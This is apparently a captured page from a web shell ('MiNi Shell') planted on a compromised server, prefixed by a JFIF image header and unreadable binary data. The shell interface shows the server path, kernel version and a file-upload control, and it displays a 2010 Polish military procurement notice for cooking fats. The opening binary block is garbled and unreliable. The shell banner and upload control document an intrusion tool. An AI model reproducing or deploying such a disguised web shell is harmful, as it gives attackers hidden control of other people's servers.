JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/18491-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa tłuszczy roślinnych i zwierzęcych 
dla Jednostki Wojskowej 2414

Sprawa Nr 04/2010/PN/Żywn.</b><br>
<b>Numer ogłoszenia: 18491 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 2414 , ul. Żwirki i Wigury 9/13, 00-909 Warszawa, woj. mazowieckie, tel. 022 6847323, 022 6848574, faks 022 6847323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jw2414.wp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa tłuszczy roślinnych i zwierzęcych 
dla Jednostki Wojskowej 2414

Sprawa Nr 04/2010/PN/Żywn..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa tłuszczy roślinnych i zwierzęcych dla Jednostki Wojskowej 2414

OPIS PRZEDMIOTU ZAMÓWIENIA



l.p.
	
Nazwa asortymentu
	
J.m.
	
Polska Norma
	
Ilość

1	Olej jadalny uniwersalny 5l	l	PN-A-86908:2000	1 200
2	Masło roślinne w kostkach 250g	kg	PN-A-86901;1997	800
3	Smalec wieprzowy w kostkach 200/250g	kg	PN-90A-85802	400

DODATKOWE DANE DOTYCZĄCE przedmiotu zamówienia:

	Cechy dyskwalifikujące:
obce posmaki, zapachy, niedostateczna ocena organoleptyczna produktu 
zanieczyszczenia mechaniczne i organiczne
masło roślinne - objawy psucia, zjełczenia, rozwarstwienia składników, 
olej - objawy psucia, zmętnienie
niespełnienie norm dotyczących zawartości kwasów tłuszczowych, metali szkodliwych dla zdrowia oraz substancji dodatkowych, 
brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia
	Opakowanie oleju 
opakowanie jednostkowe - butelka plastikowa (materiał opakowaniowy dopuszczony do kontaktu z żywnością)  5 l, 
opakowanie zbiorcze - zgrzewa termokurczliwa
opakowanie zbiorcze - ułożone warstwami na europalecie, każda warstwa przełożona przekładką tekturową, paleta ostreczowana folią, 
	Opakowanie masła roślinnego:
kostka o wadze 250g w papierze pergaminowym lub folii aluminiowej, 
opakowanie zbiorcze - pudła kartonowe lub pojemniki plastikowe, 
	Opakowanie -  smalec:
kostka o wadze 200g lub 250 g w papierze pergaminowym lub folii aluminiowej, 
opakowanie zbiorcze - pudła kartonowe lub pojemniki plastikowe, 
	Oznakowanie powinno zawierać:
a.) nazwę dostawcy - producenta, adres, 
b.) nazwę produktu, 
c.) pojemność opakowania, 
d.) datę - termin produkcji i przydatności do spożycia (należy spożyć do ... miesiąc, rok), 
e.) warunki przechowywania, 
f.) datę załadowania do transportu.

	Towar będzie odpowiadał polskim normom jakościowym PN, ponadto będzie  I klasy
	Dostawy będą odbywać się wg dostarczonych zamówień do godziny 1100
	Towar dostawca dowozić będzie do magazynu żywnościowego jednostki na swój koszt zgodnie z wymogami sanitarnym.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	[Warunki udziału w postępowaniu] O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy i nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy, a w szczególności: a) są uprawnieni do występowania w obrocie gospodarczym, b) posiadają uprawnienia i zezwolenia do wykonywania określonej działalności, c) posiadają doświadczenie tj.: zrealizowali z należytą starannością w okresie  ostatnich trzech lat przed dniem wszczęcia postępowania minimum 1 umowę odpowiadającą zakresem i wartością przedmiotowi zamówienia, d) dysponują potencjałem technicznym tj.; dysponują minimum 1 środkiem transportu spełniającym wymagania sanitarne, e) znajdują się w sytuacji ekonomicznej zapewniającej wykonanie zamówienia, tj.: są ubezpieczeni od odpowiedzialności cywilnej w związku z prowadzoną działalnością gospodarczą na kwotę nie mniejszą niż 16 000,00 zł.
2)	[Sposób oceny spełniania warunków] Ocena spełniania wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach.
3)	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące oświadczenia i dokumenty:
1)	oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy, zgodnie ze wzorem stanowiącym załącznik Nr 3 do siwz
2)	oświadczenie o niepodleganiu wykluczeniu, zgodnie ze wzorem stanowiącym załącznik Nr 4 do siwz   
3)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy; 
4)	oświadczenie podmiotów (o których mowa w art. 26 ust. 2b) pisemne zobowiązanie do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;
5)	obowiązującą decyzję, o której mowa w art. 20 ustawy z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz. U. 2006 Nr 17, poz. 127 późn. zm.) wystawioną przez powiatowego lekarza weterynarii w sprawie zatwierdzenia zakładów, które produkują lub wprowadzają do obrotu żywność w zakresie objętym przedmiotem zamówienia lub obowiązująca decyzję, o której mowa w art. 61 i 62 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. 2006r., Nr 171, poz. 1225 z późn. zm.) wystawioną przez państwowego powiatowego inspektora sanitarnego w sprawie zatwierdzenia zakładu w zakresie objętym przedmiotem zamówienia.
Decyzje wydane na podstawie ustawy o warunkach zdrowotnych żywności i żywienia (Dz. U. 2006r. Nr 171, poz. 1225 z późn. zm.) zachowują swoją aktualność na mocy art. 122 ust. 2 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. Nr 171, poz. 1225 z późn. zm.).
Zakłady produkujące lub wprowadzające żywność do obrotu objęte rejestrami prowadzonymi na podstawie art. 27 a ustawy o warunkach zdrowotnych żywności i żywienia i spełniają wymagania zamawiającego.
6)	Wykonawcy, o których mowa w art. 63 ust. 2 pkt.4 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. 2006r. Nr 171, poz. 1225 późn. zm.) składają zamiast dokumentów wymienionych w pkt. 5 zaświadczenie państwowego powiatowego inspektora sanitarnego o wpisie do rejestru zakładów w zakresie przedmiotu zamówienia, na którą wykonawca składa ofertę lub rodzaju żywności (grupy produktów) obejmujących zamówienie - wystawione nie wcześniej niż 6 miesiące przed upływem terminu składania oferty;
7)	protokół z kontroli sanitarnej właściwego organu urzędowej kontroli w zakresie bezpieczeństwa żywności o prawidłowości stosowania zasad systemu HACCP zgodnie z art. 73 ust. 1 pkt 1 litera c ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia /Dz. U. z dnia 27 września 2006r. Nr 171, poz.1225 z późn. zm./ - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
lub zaświadczenie wydane przez właściwy organ urzędowej kontroli o prawidłowości stosowania systemu HACCP - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
8)	Wykonawcy, o których mowa w art. 63 ust. 2 pkt. 4 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. 2006 r. Nr 171, poz. 1225 późn. zm.) składają zamiast dokumentów wymienionych w pkt. 7 składają aktualne zaświadczenie wystawione przez państwowy powiatowy inspektorat sanitarny o spełnianiu wymagań sanitarnych dotyczące przewozu żywności na środek transportu - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
9)	potwierdzenie zgłoszenia działalności gospodarczej w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno - spożywczymi, wydane przez Wojewódzkiego Inspektora Jakości Handlowej artykułów rolno - spożywczych, właściwego ze względu na miejsce zamieszkania lub siedzibę wykonawcy zgodnie z art. 12 ust. 1 ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno - spożywczych (Dz. U. z 2005r. Nr.187 poz.1577 z późn. zm.) - wystawione nie wcześniej niż 6 miesiące przed upływem terminu składania oferty; 
10)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów wymienionych wyżej składa dokument lub dokumenty zgodnie z zasadami określonymi w § 4  Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. 2009r. Nr 226, poz. 1817).
3.	Dokumenty wskazane powyżej mogą być przedstawione w formie oryginału, odpisu, wypisu lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
4.	Wykonawcy, którzy w określonym terminie nie złożą wymaganych przez zamawiającego oświadczeń i dokumentów lub, którzy nie złożyli pełnomocnictw, albo, którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy, zostaną przez zamawiającego wezwani do ich złożenia w określonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlegałaby odrzuceniu albo konieczne byłoby unieważnienie postępowania.
5.	Brak jakiegokolwiek z wyżej wymienionych dokumentów lub złożenie dokumentu w niewłaściwej formie (np. niepoświadczone za zgodność z oryginałem kopie), spowoduje wykluczenie wykonawcy (art. 24 ust. 2 pkt.3) i odrzucenie oferty (art. 24 ust. 4).
6.	Złożenie przez wykonawcę nieprawdziwych informacji mających wpływ na wynik prowadzonego postępowania spowoduje wykluczenie go z postępowania (art.24 ust. 2, pkt. 2) i odrzucenie oferty (art. 24 ust. 4).
7.	Celem umożliwienia oceny, oferta musi zawierać wypełniony formularz ofertowy wypełniony, co do treści według dołączonego wzoru - załącznik Nr 2 do SIWZ.
9.	Wykonawcy wspólnie ubiegający się o zamówienie ustanawiają pełnomocnika. Pełnomocnictwo należy dołączyć do oferty.
Jeżeli podmioty występują wspólnie - przed podpisaniem umowy wymagana jest umowa regulująca ich współpracę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.jw2414.wp.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA 2414
00-909 WARSZAWA
ul. Żwirki i Wigury 9/13,  bud. 21, pokój 117.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 09:00, miejsce: JEDNOSTKA WOJSKOWA 2414
00-909 WARSZAWA
ul. Żwirki i Wigury 9/13,  bud. 2, 
kancelaria (czynna w dni robocze,
 w godz.7.30 -   9.00 ;12.00 -15.30).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com